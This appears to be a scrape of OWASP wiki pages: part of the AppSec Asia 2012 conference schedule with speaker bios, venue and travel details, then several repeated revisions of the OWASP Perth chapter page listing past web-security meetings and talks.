| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(246, 246, 246);" | Short Break - Conference Movement
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''2:30-3:20 PM''
 
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" |  '''Presentation: How MITM Proxy has been slaying SSL Dragons'''
 Speaker: Jim Cheetham
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 165, 122);" |  '''Presentation: Breaking is Easy, Preventing is Hard'''
 Speakers: Matias Madou & Jacob West
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(204, 255, 122);" |  '''Presentation: OWASP Project - TBA'''
 Speaker: TBA
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''3:20-3:30 PM''
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(246, 246, 246);" | Short Break - Conference Movement
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''3:30-4:20 PM''
 
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" |  '''Presentation: Rise of the Planet of the Anonymous'''
 Speaker: Errazudin Ishak
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 165, 122);" |  '''Presentation: Anatomy of a Logic Flaw'''
 Speakers: Charles Henderson & David Byrne
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(204, 255, 122);" |  '''Presentation: OWASP Australia - Where, How, Why, When'''
 Speaker: Justin Derry & Andrew Vanderstock
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''4:20-4:30 PM''
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(246, 246, 246);" | Short Break - Conference Movement
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''4:30-5:00 PM''
 
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" | '''OWASP Appsec Asia 2012 - Conference Wrap Up'''
Speakers: OWASP Board, OWASP Appsec Asia Conference Committee
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''5:00-6:00 PM''
 
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(194, 194, 194);" | '''OWASP Sponsor - Afternoon Networking Event - TBA'''
|}



=Keynote Speakers=

'''In alphabetical order:'''

==Alastair MacGibbon==
Alastair MacGibbon is an internationally-respected authority on cybercrime, including Internet fraud, consumer victimisation and a range of Internet security and safety issues. He is the managing partner of Surete Group, a consultancy dealing with improved customer retention for Internet companies by increasing trust and reducing negative user experiences. Prior to this for almost 5 years Alastair headed Trust & Safety at eBay Australia and later eBay Asia Pacific. He was a Federal Agent with the Australian Federal Police for 15 years, his final assignment as the founding Director of the Australian High Tech Crime Centre.

==Jacob West==
Jacob West is Director, Software Security Research for the Enterprise Security Products division of Hewlett-Packard. West is a world-recognized expert on software security and brings a technical understanding of the languages and frameworks used to build software together with extensive knowledge about how real-world systems fail. In 2007, he co-authored the book "Secure Programming with Static Analysis" with colleague and Fortify founder Brian Chess. Today, the book remains the only comprehensive guide to static analysis and how developers can use it to avoid the most prevalent and dangerous vulnerabilities in code. West is a frequent speaker at industry events, including RSA Conference, Black Hat, Defcon, OWASP, and many others. A graduate of the University of California, Berkeley, West holds dual-degrees in Computer Science and French and resides in San Francisco, California.

==Dr. Jason Smith from CERT Australia==
Dr Jason Smith is an assistant director at the national CERT, CERT Australia, which is part of the Attorney-General's Department. He is an experienced cyber security researcher and consultant, having provided consultancy services over the last decade on information infrastructure protection to government and critical infrastructure utilities.

Since joining government Jason has been involved in the development and execution national scale cyber exercises and the advanced cyber security training for control systems conducted by the US Department of Homeland Security.

Jason holds a degree in software engineering and data communications, a PhD in information security and is an Adjunct Associate Professor at the Queensland University of Technology.

[http://www.cert.gov.au/ About CERT Australia]

==Jeremiah Grossman==
Jeremiah Grossman is the Founder and CTO of WhiteHat Security, where he is responsible for Web security R&D and industry outreach. Mr. Grossman has written dozens of articles, white papers, and is a published author. His work has been featured in the Wall Street Journal, NY Times and many other mainstream media outlets. As a well-known security expert and industry veteran, Mr. Grossman has been a guest speaker on five continents at hundreds of events including BlackHat, RSA, ISSA, and others. He has been invited to guest lecture at top universities such as UC Berkeley, Stanford, Harvard, UoW Madison, UCLA, and Carnegie Mellon. Mr. Grossman is also a co-founder of the Web Application Security Consortium (WASC) and previously named one of InfoWorld's Top 25 CTOs. Before founding WhiteHat, Mr. Grossman was an information security officer at Yahoo!

Mr. Grossman was recently a speaker at TEDxMaui. [http://tedxmaui.com/2011/12/30/speaker-spotlight-jeremiah-grossman/ Learn more here.]

==Rafal Los==
Rafal Los, Chief Security Evangelist for Hewlett-Packard Software, combines over a decade of subject-matter expertise in information security and risk management with a critical business perspective. From technical research to building and implementing enterprise application security programs, Rafal has a track record with organizations of diverse sizes and verticals. He is a featured speaker at events around the globe, and has presented at events produced by OWASP, ISSA, Black Hat, and SANS among many others. He stays active in the community by writing, speaking and contributing research, representing HP in OWASP, the Cloud Security Alliance and other industry groups. His blog, Following the White Rabbit, with his unique perspective on security and risk management has amassed a following from his industry peers, business professionals, and even the media and can be found at [http://hp.com/go/white-rabbit http://hp.com/go/white-rabbit]. 
Prior to joining HP, Los defined what became the software security program and served as a regional security lead at a Global Fortune 100 contributing to the global organization's security and risk-management strategy internally and externally. Rafal prides himself on being able to add a 'tint of corporate realism' to information security. 
Rafal received his B. S. in Computer Information Systems from Concordia University, River Forest, Ill.

;Threat Profiling the Mobile Application Ecosystem:The flood gates of the mobile age have swung wide open, and whether your organization is prepared or not - mobile applications utilizing cloud resources are the future. As organizations race to release ‘mobile’ versions of applications that do everything from home automation to managing your medications and health history, software security assurance is paramount from both regulatory and risk management perspectives. This requires an entirely different approach than simply running scans or handing off your source code to be ‘audited.’ Analyzing the source code, the mobile application, remote application interfaces and the communication protocols between them are critical to understanding the complete threat profile of the mobile application. Simply looking at one of these components can provide a dangerously misleading representation and lead to increased risk exposure. Rafal will discuss the full threat profile of mobile applications, including their real attack surface and provide thoughts on the future of mobile applications as enterprises migrate further into cloud computing.

=Track Session Speakers=

{{:AppSecAsiaPac2012/Talks}}

=Sponsors=

The Conference Committee is excited to announce that the conference has been openly supported by the following vendors and associations. Without the great support of these companies and organisations the 2012 event would not be what it is today.

<h2>Diamond & Platinum Sponsors</h2>
The OWASP Conference 2012, welcomes our sponsors for Diamond and Platinum. There are still spaces available for sponsorship, but it's closing fast.

More information is available on our sponsorship packages by viewing the sponsor pack [[File:AppSec AsiaPac 2012 Sponsorship.pdf]]. Contact our Committee for more information.

[[File:Fortify HP logo.png|link=http://www.fortify.com]]

<h2>Gold & Silver Sponsors</h2>
The OWASP Conference 2012, welcomes our sponsors for Gold and Silver. The conference still has availability for other Gold and Silver sponsors.

[[File:AppsecureTransLogo.png|link=http://www.appsecure.com/]]
[[File:Imperva 312x54.jpg|link=http://www.imperva.com/]]
[[File:CS-LogoWeb.png|link=http://www.contentsecurity.com.au/]]
[[File:Trustwave small.png|link=http://www.trustwave.com/]]

<h2> Associations & Supporters</h2>
We are proudly supported by the following Industry Associations and Media outlets.

[[File:Auscert-Header-logo.gif|link=http://www.auscert.org.au/]]
[[File:AisaLogo.png|link=http://www.aisa.org.au/]]

=Chapters Workshop=

{{:AppSecAsiaPac2012/Chapters_Workshop}}

=Venue=

We're excited to announce that the location of the OWASP Conference for Appsec Asia 2012 will be held at:

'''Four Points Sheraton, Darling Harbour''' 
161 Sussex Street 
Sydney, New South Wales 2000 
Australia 
 

The facility provides hotel rooms and conference facilities, OWASP has secured cheap room rates directly in the hotel for the duration of the event.

If you don't know your way around Sydney, here's the Google Maps link to the Hotel.

http://maps.google.com.au/maps/place?q=Four+Points+by+Sheraton+Sydney,+Sussex+Street,+Sydney,+New+South+Wales&hl=en&cid=7369128618339939693

[[File:FourPointsSheratonDarlingHarbour.jpg]]
 

We are using both the Ground and upper levels. The majority of the event will be held on the ground level, including all breaks etc. Attendees will find the registration and conference desk located at the Ground level near Hotel Reception. (You're not going to get lost, as we take up most of the ground level for this event.)

Further details about venue locations will be posted when they become available.

=Travel and Accommodations=
For assistance with any of the items below, feel free to utilize OWASP's preferred travel agency: 
Segale Travel Service contact information is: +1-800-841-2276 
Sr. Travel Consultants: 
[mailto:mariam@segaletravel.com Maria Martinez]...ext 524 
[mailto:linnv@segaletravel.com Linn Vander Molen]...ext 520

Additionally, the [mailto:appsecasia2012@owasp.org Conference Planning Team] is available to answer any questions!

==Accommodation==

We've been able to arrange for accommodation within the Four Points Sheraton Hotel(where the training and conference will be held) for attendees. These rooms have been allocated at a special rate, and available strictly for a limited time. To book these rooms at the special rate, you need to use the booking link shown below. These rooms are available one night either side of the event ensuring that if you are travelling interstate or international it's easy to find a room at a good rate. The room rate allocated for the event is $200 AUD Inclusive per night.

'''Four Points Sheraton, Darling Harbour''' 
161 Sussex Street 
Sydney, New South Wales 2000 
Australia 
 

'''[http://www.starwoodmeeting.com/Book/OWASP http://www.starwoodmeeting.com/Book/OWASP]'''

==Travel Domestic==

The OWASP Conference is to be held in Sydney at the Darling Harbour precinct. Hotel Location, http://maps.google.com.au/maps/place?q=Four+Points+by+Sheraton+Sydney,+Sussex+Street,+Sydney,+New+South+Wales&hl=en&cid=7369128618339939693

==International Travel==

The Sydney International Airport is located adjacent to the Domestic terminal. Similar taxi fares to the city and hotel venue apply.
If you are travelling by train, you can ride the train from the International terminal all the way to the Town Hall station as above.

==Airport Transportation==

*Any major Airline carrier will fly you into Sydney Airport, from here, you can take a Taxi (Approx $35-40 AUD).
*[http://www.kst.com.au KST Sydney Airport Shuttle] -- $18AUD oneway/ $32AUD roundtrip
* Another option is the train from the Airport, which you can ride all the way into the closest station which is Town Hall. From this stop the hotel is a small downhill walk (no more then 5-10mins) from the station.

==Driving Instructions==

''From Sydney Airport (South)''

Travel along Southern Cross Drive and take the South Dowling Street exit.

Turn right onto Dacey Avenue.

At the second set of traffic lights turn left onto Anzac Parade.

Follow Anzac Parade past Moore Park on your right; Anzac Parade will become Flinders Street.

Turn left onto Oxford Street and follow to Liverpool Street; Hyde Park will be on your right.

Continue along Liverpool Street and turn right onto Kent Street.

Travel five blocks and turn left onto Erskine Street.

Immediately turn left again onto Sussex Street. The hotel will be on your right.

''From East''

Proceed along New South Head Road. Continue onto William Street and then onto Park Street; Hyde Park will be on your right.

Proceed along Park Street as it becomes Druitt Street and turn right onto Kent Street.

Travel approximately three blocks and turn left onto Erskine Street.

Immediately turn left again onto Sussex Street. The hotel will be on your right.

''From West''

Proceed along the Western Distributor towards the city taking the City North exit followed by the Sussex Street South Exit.

Turn right onto Sussex Street, the hotel will be on your right.

''From North''

Take the Pacific Highway/Warringah Highway and proceed over the Sydney Harbour Bridge.

Take the York street exit off the bridge and continue along before turning right into Erskine Street .

Proceed approximately three blocks before turning left into Sussex Street. The hotel will be on your right.

=Contact Us=

Justin Derry - Planning Committee Co-Chair 
Andrew van der Stock - Planning Committee Co-Chair 
Christian Frichot - Planning Committee Member 
Andrew Mueller - Planning Committee Member 
Mohd Fazli Azran - Global Conference Committee Liaison 
Sarah Baso - OWASP Operational Support 

If you are interested in helping out with this conference or have any questions, please contact us at: appsecasia2012@owasp.org

=Archives=

*[https://www.owasp.org/index.php/AppSecAsiaPac2012/CFP Call for Papers]
*[[Speaker Agreement]]
*[https://www.owasp.org/index.php/AppSecAsiaPac2012/CFT Call for Trainers]
*[https://www.owasp.org/images/8/80/APAC2012_Training_Instructor_Agreement.pdf Training Instructor Agreement]
*Information about the [https://www.owasp.org/index.php/AppSecAsiaPac2012/OWASP_Track OWASP Track]



<headertabs />

Perth Australia

2011-12-09T15:23:03Z

Xntrik: Shifted Defending Web Apps to Previous Events.

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:joshua@qwek.com Joshua Qwek]
* Timothy Bessant
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

Watch this space!

== Previous OWASP Meetings ==

=== Defending Web Applications (December 2011) ===

Worried about having your site hacked? What about your Wordpress blog? David Taylor and Christian Frichot of OWASP Perth are back to talk about all things web security, and instead of spending a couple of hours trying to scare you with how to break stuff, we hope to educate you on how best to defend your web applications.

We’ll be covering a range of defensive methods, including addressing coding vulnerabilities directly, implementing an open source HIDS, or even implementing your own 2nd factor authentication scheme utilising the Google Authenticator.

Presented at Perth AISA's Techday 2011

=== How minor vulnerabilities can do ‘very bad things’ - The Sequel (May 2011) ===

Missed the 2010 AISA Techday session? Haven't made it out to an OWASP event lately? David and Christian are happy to be presenting their updated presentation, including live demos, on the impacts of web application security vulnerabilities at the upcoming Australia / New Zealand Testing Board (ANZTB) SIGIST meeting!

=== Cross-site scripting: You don’t always know who the actors are (May 2011) ===

So the time has come. Your company has finally approved the project to update your online web presence. A brand new, whiz-bang Content Management System is being deployed and your developers are frantically coding away to prepare a whole batch of fresh new content. Before you realise it, the delivery date is a week away and you have some security guy screaming at you about cross-site scripting issues!

Cross-site scripting? So what.

Does this experience sound familiar to you?

In this session Christian Frichot will spend some time dissecting this common web application vulnerability, and just how serious its impacts can be. Exploitation of cross-site scripting is no longer just within the realm of nerdy, hacker types, new (and old) tools out there allow this trivial vulnerability to be used for so much more, including keystroke logging, and even forcing your iPhone to dial a number via Skype. For those facing these issues there are plenty of resources which can help, and Christian will cover these as well.

=== How minor vulnerabilities can do ‘very bad things’ (December 2010) ===

The Perth branch of the Australian Information Security Association is pleased to announce details for the second annual Perth AISA Tech day to be held on the 3rd December. This year we are holding the event in the heart of Perth’s CBD thanks to proud AISA supporters L7 Solutions.

Appearing for their second consecutive year, regular AISA and OWASP members Christian and David are following on from last year’s topic. Last year you will remember that the demonstrated a number of classes of vulnerabilities in web applications (XSS, CSRF, SQL Injection etc.). This year they are going to show how relatively minor vulnerabilities can be exploited and leveraged to do ‘very bad things’ ™ to the client browser, the web server or both.

This session will include demonstrations of the BeEF browser exploitation framework and Metasploit.

=== Web Application (In)Security Brief - Injection (September 2010) ===

Having recently run training sessions on web application security for SyScan'10 and Blackhat, we're lucky enough to have Wade Alcorn from NGS to give a brief presentation on "Exploiting and discovering injection" for September's Perth OWASP Meeting. Come on up to Level 46 of the Bankwest Tower to join us discuss web application security with Wade and others. Please RSVP to ensure appropriate seating arrangements and we're hoping to then shift off to the Generous Squire for a quick beverage afterwards!

==== About the presenter ====

Wade Alcorn has experience in numerous aspects of offensive information security assessments. This ranges from bluetooth, reverse engineering and web application assessments to managing large teams of security professionals. Prior to joining NGS, Wade had been responsible for cutting-edge PKI and VPN development using technologies including C/C++ and Java. He has presented at conferences including BlackHat and AusCERT.

=== Security Event and Incident Management" Panel Session (Perth AISA August 2010) ===

==== [http://www.aisa.org.au/index.php?page=301 AISA Details] ====

Log management is a necessary task in Security Management, but is often neglected. There are various pressures being placed on businesses, such as audit and compliance, industry standards (eg PCI, APRA), internal security maturity which have allowed organisations to understand the benefits to be gained from undertaking a SEIM project.

There are many options for organisations looking to develop log management and security incident response processes, which range from open source syslog solutions, through to vendor supplied SEIM products and cloud based monitoring solutions.

A panel selected from a variety of industries including representation from security consulting, corporate and vendor will discuss the considerations, options and benefits of employing SEIM technology and processes.

We were fortunate to have Joshua Qwek, one of Perth's OWASP chapter lead, participate in this panel.

=== How mature is your software security process? (Perth AISA May 2010) ===

==== [http://www.aisa.org.au/index.php?page=287 AISA Details] ====

As the security industry continues to change its focus to application
security a lot of companies who rely on software, developed either
internally or externally, are wondering what they can do reduce the risk
of security flaws.

Microsoft's Security Development Lifecycle (SDL) model can look
appealing, however without a clear understanding of what your software
security processes look like, it may be difficult to achieve any real
improvements.

Implementing a holistic end-to-end software security process can often
look like an impossible task, and while the end picture resembles Eden,
it's often the first steps that everyone stumbles on. As the saying goes
"You can't manage what you can't measure", and without a clear
understanding of what your software security processes look like now it's
unlikely that you can achieve any real improvements.

OWASP's Open Software Assurance Maturity Model, or OpenSAMM, aims
to assist organisations, both big and small, in evaluating their existing
software security practices and constructing a measurable, balanced
program to increase their software security.

Wondering how this can help your internal development processes? Want
to have a more rigid process to audit your externally developed software
processes? Then perhaps OWASP's OpenSAMM project can assist.

This meeting will be co-hosted by both the local AISA chapter and the Perth OWASP chapter.

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

[[Category:OWASP Chapter]]
[[Category:Australia]]

Perth Australia

2011-11-21T04:36:50Z

Xntrik: Added the 2011 AISA Techday presentation to upcoming events.

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:joshua@qwek.com Joshua Qwek]
* Timothy Bessant
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

=== Defending Web Applications (December 2011) ===

Worried about having your site hacked? What about your Wordpress blog? David Taylor and Christian Frichot of OWASP Perth are back to talk about all things web security, and instead of spending a couple of hours trying to scare you with how to break stuff, we hope to educate you on how best to defend your web applications.

We’ll be covering a range of defensive methods, including addressing coding vulnerabilities directly, implementing an open source HIDS, or even implementing your own 2nd factor authentication scheme utilising the Google Authenticator.

Come join us at the annual [https://www.aisa.org.au/branches/perth/events/perth-tech-day-2011/ AISA Perth Tech day!].

Don't worry if you aren't an AISA Member, you can still attend, but you'll have to RSVP via us.

Date: Friday 2nd of December 2011
Time: 9:00am - 5:00pm
Location: Medina Grand, Perth
RSVP: [mailto:xntrik@gmail.com xntrik@gmail.com]

== Previous OWASP Meetings ==

=== How minor vulnerabilities can do ‘very bad things’ - The Sequel (May 2011) ===

Missed the 2010 AISA Techday session? Haven't made it out to an OWASP event lately? David and Christian are happy to be presenting their updated presentation, including live demos, on the impacts of web application security vulnerabilities at the upcoming Australia / New Zealand Testing Board (ANZTB) SIGIST meeting!

=== Cross-site scripting: You don’t always know who the actors are (May 2011) ===

So the time has come. Your company has finally approved the project to update your online web presence. A brand new, whiz-bang Content Management System is being deployed and your developers are frantically coding away to prepare a whole batch of fresh new content. Before you realise it, the delivery date is a week away and you have some security guy screaming at you about cross-site scripting issues!

Cross-site scripting? So what.

Does this experience sound familiar to you?

In this session Christian Frichot will spend some time dissecting this common web application vulnerability, and just how serious its impacts can be. Exploitation of cross-site scripting is no longer just within the realm of nerdy, hacker types, new (and old) tools out there allow this trivial vulnerability to be used for so much more, including keystroke logging, and even forcing your iPhone to dial a number via Skype. For those facing these issues there are plenty of resources which can help, and Christian will cover these as well.

=== How minor vulnerabilities can do ‘very bad things’ (December 2010) ===

The Perth branch of the Australian Information Security Association is pleased to announce details for the second annual Perth AISA Tech day to be held on the 3rd December. This year we are holding the event in the heart of Perth’s CBD thanks to proud AISA supporters L7 Solutions.

Appearing for their second consecutive year, regular AISA and OWASP members Christian and David are following on from last year’s topic. Last year you will remember that the demonstrated a number of classes of vulnerabilities in web applications (XSS, CSRF, SQL Injection etc.). This year they are going to show how relatively minor vulnerabilities can be exploited and leveraged to do ‘very bad things’ ™ to the client browser, the web server or both.

This session will include demonstrations of the BeEF browser exploitation framework and Metasploit.

=== Web Application (In)Security Brief - Injection (September 2010) ===

Having recently run training sessions on web application security for SyScan'10 and Blackhat, we're lucky enough to have Wade Alcorn from NGS to give a brief presentation on "Exploiting and discovering injection" for September's Perth OWASP Meeting. Come on up to Level 46 of the Bankwest Tower to join us discuss web application security with Wade and others. Please RSVP to ensure appropriate seating arrangements and we're hoping to then shift off to the Generous Squire for a quick beverage afterwards!

==== About the presenter ====

Wade Alcorn has experience in numerous aspects of offensive information security assessments. This ranges from bluetooth, reverse engineering and web application assessments to managing large teams of security professionals. Prior to joining NGS, Wade had been responsible for cutting-edge PKI and VPN development using technologies including C/C++ and Java. He has presented at conferences including BlackHat and AusCERT.

=== Security Event and Incident Management" Panel Session (Perth AISA August 2010) ===

==== [http://www.aisa.org.au/index.php?page=301 AISA Details] ====

Log management is a necessary task in Security Management, but is often neglected. There are various pressures being placed on businesses, such as audit and compliance, industry standards (eg PCI, APRA), internal security maturity which have allowed organisations to understand the benefits to be gained from undertaking a SEIM project.

There are many options for organisations looking to develop log management and security incident response processes, which range from open source syslog solutions, through to vendor supplied SEIM products and cloud based monitoring solutions.

A panel selected from a variety of industries including representation from security consulting, corporate and vendor will discuss the considerations, options and benefits of employing SEIM technology and processes.

We were fortunate to have Joshua Qwek, one of Perth's OWASP chapter lead, participate in this panel.

=== How mature is your software security process? (Perth AISA May 2010) ===

==== [http://www.aisa.org.au/index.php?page=287 AISA Details] ====

As the security industry continues to change its focus to application
security a lot of companies who rely on software, developed either
internally or externally, are wondering what they can do reduce the risk
of security flaws.

Microsoft's Security Development Lifecycle (SDL) model can look
appealing, however without a clear understanding of what your software
security processes look like, it may be difficult to achieve any real
improvements.

Implementing a holistic end-to-end software security process can often
look like an impossible task, and while the end picture resembles Eden,
it's often the first steps that everyone stumbles on. As the saying goes
"You can't manage what you can't measure", and without a clear
understanding of what your software security processes look like now it's
unlikely that you can achieve any real improvements.

OWASP's Open Software Assurance Maturity Model, or OpenSAMM, aims
to assist organisations, both big and small, in evaluating their existing
software security practices and constructing a measurable, balanced
program to increase their software security.

Wondering how this can help your internal development processes? Want
to have a more rigid process to audit your externally developed software
processes? Then perhaps OWASP's OpenSAMM project can assist.

This meeting will be co-hosted by both the local AISA chapter and the Perth OWASP chapter.

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

[[Category:OWASP Chapter]]
[[Category:Australia]]

Perth Australia

2011-05-26T01:06:11Z

Xntrik: shifted last night's ANZTB meeting into Previous meetings.

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:joshua@qwek.com Joshua Qwek]
* Timothy Bessant
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

Watch this space!

== Previous OWASP Meetings ==

=== How minor vulnerabilities can do ‘very bad things’ - The Sequel (May 2011) ===

Missed the 2010 AISA Techday session? Haven't made it out to an OWASP event lately? David and Christian are happy to be presenting their updated presentation, including live demos, on the impacts of web application security vulnerabilities at the upcoming Australia / New Zealand Testing Board (ANZTB) SIGIST meeting!

=== Cross-site scripting: You don’t always know who the actors are (May 2011) ===

So the time has come. Your company has finally approved the project to update your online web presence. A brand new, whiz-bang Content Management System is being deployed and your developers are frantically coding away to prepare a whole batch of fresh new content. Before you realise it, the delivery date is a week away and you have some security guy screaming at you about cross-site scripting issues!

Cross-site scripting? So what.

Does this experience sound familiar to you?

In this session Christian Frichot will spend some time dissecting this common web application vulnerability, and just how serious its impacts can be. Exploitation of cross-site scripting is no longer just within the realm of nerdy, hacker types, new (and old) tools out there allow this trivial vulnerability to be used for so much more, including keystroke logging, and even forcing your iPhone to dial a number via Skype. For those facing these issues there are plenty of resources which can help, and Christian will cover these as well.

=== How minor vulnerabilities can do ‘very bad things’ (December 2010) ===

The Perth branch of the Australian Information Security Association is pleased to announce details for the second annual Perth AISA Tech day to be held on the 3rd December. This year we are holding the event in the heart of Perth’s CBD thanks to proud AISA supporters L7 Solutions.

Appearing for their second consecutive year, regular AISA and OWASP members Christian and David are following on from last year’s topic. Last year you will remember that the demonstrated a number of classes of vulnerabilities in web applications (XSS, CSRF, SQL Injection etc.). This year they are going to show how relatively minor vulnerabilities can be exploited and leveraged to do ‘very bad things’ ™ to the client browser, the web server or both.

This session will include demonstrations of the BeEF browser exploitation framework and Metasploit.

=== Web Application (In)Security Brief - Injection (September 2010) ===

Having recently run training sessions on web application security for SyScan'10 and Blackhat, we're lucky enough to have Wade Alcorn from NGS to give a brief presentation on "Exploiting and discovering injection" for September's Perth OWASP Meeting. Come on up to Level 46 of the Bankwest Tower to join us discuss web application security with Wade and others. Please RSVP to ensure appropriate seating arrangements and we're hoping to then shift off to the Generous Squire for a quick beverage afterwards!

==== About the presenter ====

Wade Alcorn has experience in numerous aspects of offensive information security assessments. This ranges from bluetooth, reverse engineering and web application assessments to managing large teams of security professionals. Prior to joining NGS, Wade had been responsible for cutting-edge PKI and VPN development using technologies including C/C++ and Java. He has presented at conferences including BlackHat and AusCERT.

=== Security Event and Incident Management" Panel Session (Perth AISA August 2010) ===

==== [http://www.aisa.org.au/index.php?page=301 AISA Details] ====

Log management is a necessary task in Security Management, but is often neglected. There are various pressures being placed on businesses, such as audit and compliance, industry standards (eg PCI, APRA), internal security maturity which have allowed organisations to understand the benefits to be gained from undertaking a SEIM project.

There are many options for organisations looking to develop log management and security incident response processes, which range from open source syslog solutions, through to vendor supplied SEIM products and cloud based monitoring solutions.

